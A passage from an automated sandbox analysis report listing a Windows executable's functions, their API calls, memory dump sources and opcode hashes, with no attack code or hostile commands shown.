                                                                                                                                                                                                                                                                                                                                                                                                                                          • _open_osfhandle.MSVCRT ref: 00007FF706EB5A4F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF706EB260D), ref: 00007FF706ED37AA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF706ED37D2
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 22757656-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b33ee2a7ed952305bec2ed141cee8276d359ee1b1f2704740eb68ce752a909f5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A116076A147458BE7106B24EC5837EBAA0FB8AB64FA44734D62E473D0CF3CD4498B10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC9158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 140117192-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 66c5a448fcfe38d6b95ab222b1e1a792a36f987f66db608c953a84b29008b809
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B21D439908B4585E740AB04FCA436AB3A4FF98758F900035EA8D47764EF7DE445CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED5690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF706ED5433,?,?,?,00007FF706ED69B8,?,?,?,?,?,00007FF706EC8C39), ref: 00007FF706ED56C5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF706ED56D9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF706ED5433,?,?,?,00007FF706ED69B8,?,?,?,?,?,00007FF706EC8C39), ref: 00007FF706ED56FD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF706ED5711
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 53b3ce13eba80ac57086905b880488a9147e2ca0d96b50d2d0bb5bf5de62c004
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C111876A04B91C6EB109F56E8440AEFBB0FB8DF84B998165DB4E03718DF38E466C750
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC4AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB8798), ref: 00007FF706EC4AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB8798), ref: 00007FF706EC4AEF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A28
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A66
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: memmove.MSVCRT(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB8798), ref: 00007FF706ECEE64
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF706ECEE78
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2759988882-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b10c07bc1a0ad5963ff7508cafcbec921c5928dde487bf9fecb769b7ca964742
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5F06264A05B42CAEF14A7659C2417BE9D1FF8EB51B889474CD0E43390EF3CA4058330
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDF22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1606018815-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ac353bab743c5f6a543fb53e7994505fdb400558d4e8f12e5169b06e2f1f0e69
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FF01235624B41CBD7046B10EC5417AFA60FF8AB06F859274DA0B07394DF3CD0098B10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EE10D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF706ED827A), ref: 00007FF706EE11DC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF706ED827A), ref: 00007FF706EE1277
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcessmemmovewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1135967885-381716982
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1a8a2c775685e02cf1b2bfab1f3375190b1ad7c956f01dc94337fd03ea84a7f7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8471C775A0874286D760AF15AC606BBF6E4FFA9798FD04235C94D83B94DF3CA4918B20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBE420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC06D6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC06F0
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC074D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC0762
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBEF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF000
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBEF40: wcschr.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF031
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBEF40: iswdigit.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF0D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT ref: 00007FF706ECCCBC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECCCE0
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3282654869-1994581435
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 75b1309d5c687d3f11c9717ebd62301fe66d33329ca8b2e84f456ad756eff731
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6561B361A0A74282FA14BB259C741BBE291BF54BE4FD45635CA1E0B7E1EF3CF4418320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EE08EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memmovewcsncmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: 0123456789
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3879766669-2793719750
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b3fb369deff4d4afefb78b93d750e48c4b9e67a4b4b225bf48054585d7624ef2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3541F336F18B8A85EA65AF26EC102BBA294FF44B98F945131CE0E43784EF7CD4518390
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED9784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706ED97D0
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD46E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD485
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: iswspace.MSVCRT ref: 00007FF706EBD54D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD569
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD58C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706ED98D7
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
